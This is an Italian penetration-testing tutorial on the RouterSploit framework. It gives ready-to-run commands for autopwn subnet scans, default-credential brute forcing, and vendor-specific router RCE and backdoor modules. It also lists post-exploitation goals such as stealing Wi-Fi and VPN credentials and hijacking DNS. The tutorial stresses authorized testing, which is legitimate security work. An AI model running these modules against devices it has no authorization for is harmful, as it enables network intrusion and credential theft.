RouterSploit: Framework di Exploit per Router e IoT

RouterSploit è un framework per testare vulnerabilità su router e dispositivi IoT. Include moduli di scanning, exploit e brute-force.
- Pubblicato il 2026-02-22
- Tempo di lettura: 4 min
RouterSploit è un framework di exploitation dedicato a dispositivi embedded come router, access point, NAS e dispositivi IoT. Mentre Metasploit eccelle su sistemi tradizionali, RouterSploit si specializza nel mondo embedded con exploit specifici per firmware vulnerabili di tutti i vendor principali. In questa guida impari a identificare e sfruttare vulnerabilità nei dispositivi di rete.
Perché RouterSploit #
I dispositivi embedded rappresentano spesso l’anello debole delle reti. Router consumer, access point aziendali, telecamere IP e dispositivi IoT raramente ricevono aggiornamenti di sicurezza e spesso mantengono credenziali di default. RouterSploit automatizza il testing di queste vulnerabilità comuni.
Il framework include oltre 130 exploit per vendor come Cisco, D-Link, TP-Link, Netgear, ASUS, MikroTik, Huawei e molti altri, più moduli per testare credenziali di default su decine di protocolli.
Installazione e Setup #
RouterSploit è scritto in Python e si installa facilmente:
git clone https://github.com/threat9/routersploit.git /opt/routersploit
cd /opt/routersploit
pip3 install -r requirements.txt
python3 rsf.pySu Kali Linux potrebbe essere disponibile nei repository:
sudo apt install routersploitAl primo avvio vedrai l’interfaccia familiare a chi usa Metasploit:
______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
| // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
| |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_
\_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__|
| |
Router Exploitation Framework |_|
rsf >Struttura dei Moduli #
RouterSploit organizza i moduli in categorie logiche:
exploits/ - Exploit per vulnerabilità specifiche, organizzati per vendor e modello.
creds/ - Moduli per testare credenziali di default su vari protocolli (HTTP, FTP, SSH, Telnet, SNMP).
scanners/ - Scanner per identificare automaticamente vulnerabilità note.
payloads/ - Payload per post-exploitation.
La navigazione segue la stessa logica di Metasploit:
rsf > use exploits/routers/dlink/dir_300_600_rce
rsf (D-Link DIR-300 & DIR-600 RCE) > show options
rsf (D-Link DIR-300 & DIR-600 RCE) > set target 192.168.1.1
rsf (D-Link DIR-300 & DIR-600 RCE) > runScanner Autopwn #
Il modulo più potente è l’autopwn scanner che testa automaticamente tutte le vulnerabilità note contro un target:
rsf > use scanners/autopwn
rsf (AutoPwn) > set target 192.168.1.1
rsf (AutoPwn) > runL’autopwn esegue in sequenza tutti gli exploit e moduli credential per il target, riportando cosa funziona:
[*] Running module exploits/routers/dlink/dir_300_600_rce...
[-] Target is not vulnerable
[*] Running module exploits/routers/dlink/dir_645_password_disclosure...
[+] Target IS vulnerable!
[*] Running module creds/routers/dlink/ftp_default_creds...
[+] Credentials found! admin:adminPer scansionare un’intera subnet:
rsf (AutoPwn) > set target 192.168.1.0/24
rsf (AutoPwn) > runTest Credenziali di Default #
Uno dei problemi più comuni nei dispositivi embedded sono le credenziali mai cambiate. RouterSploit include moduli specifici per ogni vendor e protocollo.
Test credenziali HTTP:
rsf > use creds/routers/generic/http_default_creds
rsf (HTTP Default Creds) > set target 192.168.1.1
rsf (HTTP Default Creds) > runTest FTP:
rsf > use creds/generic/ftp_default
rsf (FTP Default) > set target 192.168.1.1
rsf (FTP Default) > runTest SSH:
rsf > use creds/generic/ssh_default
rsf (SSH Default) > set target 192.168.1.1
rsf (SSH Default) > runIl database interno contiene le credenziali di default di centinaia di dispositivi, dal classico admin:admin alle combinazioni specifiche per vendor.
Exploit per Vendor Specifici #
RouterSploit ha exploit mirati per vulnerabilità note dei principali produttori.
D-Link #
I router D-Link hanno storicamente molte vulnerabilità. Per RCE su DIR-300/600:
rsf > use exploits/routers/dlink/dir_300_600_rce
rsf > set target 192.168.1.1
rsf > runPer disclosure password su DIR-645:
rsf > use exploits/routers/dlink/dir_645_password_disclosure
rsf > set target 192.168.1.1
rsf > runNetgear #
rsf > use exploits/routers/netgear/r7000_r6400_rce
rsf > set target 192.168.1.1
rsf > runTP-Link #
rsf > use exploits/routers/tplink/wdr740nd_wdr740n_backdoor
rsf > set target 192.168.1.1
rsf > runMikroTik #
I dispositivi MikroTik sono comuni in ambienti enterprise:
rsf > use exploits/routers/mikrotik/winbox_auth_bypass
rsf > set target 192.168.1.1
rsf > runWorkflow di Assessment IoT #
Un assessment completo di dispositivi embedded segue questo flusso:
- Discovery - Identifica dispositivi con nmap:
nmap -sV -p 80,443,23,22,21 192.168.1.0/24 --open- Fingerprinting - Identifica vendor e modello dall’interfaccia web o banner
- Autopwn - Lancia lo scanner automatico su ogni dispositivo identificato
- Credential Testing - Se autopwn non trova vulnerabilità, testa credenziali di default
- Manual Exploitation - Per vulnerabilità non coperte da RouterSploit, cerca su Exploit-DB
- Post-Exploitation - Una volta dentro, estrai configurazione, credenziali WiFi, e mappa la rete interna
Post-Exploitation su Router #
Una volta ottenuto accesso, i router offrono informazioni preziose:
- Credenziali WiFi - Spesso in chiaro nella configurazione
- Client connessi - Mappa dispositivi sulla rete
- Configurazione VPN - Credenziali per accesso remoto
- Log - Traffico e attività degli utenti
- DNS settings - Possibilità di DNS hijacking
Considerazioni su Dispositivi Reali #
I dispositivi embedded sono fragili. A differenza di server tradizionali:
- Risorse limitate - Troppi thread possono crashare il dispositivo
- No recovery facile - Un crash potrebbe richiedere reset fisico
- Produzione - Un router down blocca intere reti
Durante penetration test autorizzati, comunica sempre il rischio al cliente prima di testare dispositivi di rete in produzione.
Aggiornamento Exploit #
RouterSploit è community-driven. Aggiorna regolarmente per avere gli ultimi moduli:
cd /opt/routersploit
git pullPuoi anche contribuire nuovi exploit seguendo la struttura dei moduli esistenti.
FAQ #
RouterSploit vs Metasploit per IoT?
RouterSploit è specializzato con exploit specifici per embedded. Metasploit ha meno moduli per questo ambito. Usali entrambi.
Funziona su dispositivi aggiornati?
Dipende. Molti dispositivi consumer non vengono mai aggiornati. Enterprise è generalmente più sicuro ma non immune.
Posso aggiungere exploit custom?
Sì, RouterSploit è modulare. Crea moduli Python nella directory appropriata seguendo il template esistente.
È legale testare router?
Solo dispositivi di tua proprietà o con autorizzazione scritta. Per assessment IoT professionali, hackita.it/servizi.
Vuoi supportare HackIta? Visita hackita.it/supporto per donazioni. Per penetration test IoT professionali e formazione 1:1, scopri hackita.it/servizi.
Risorse: RouterSploit GitHub







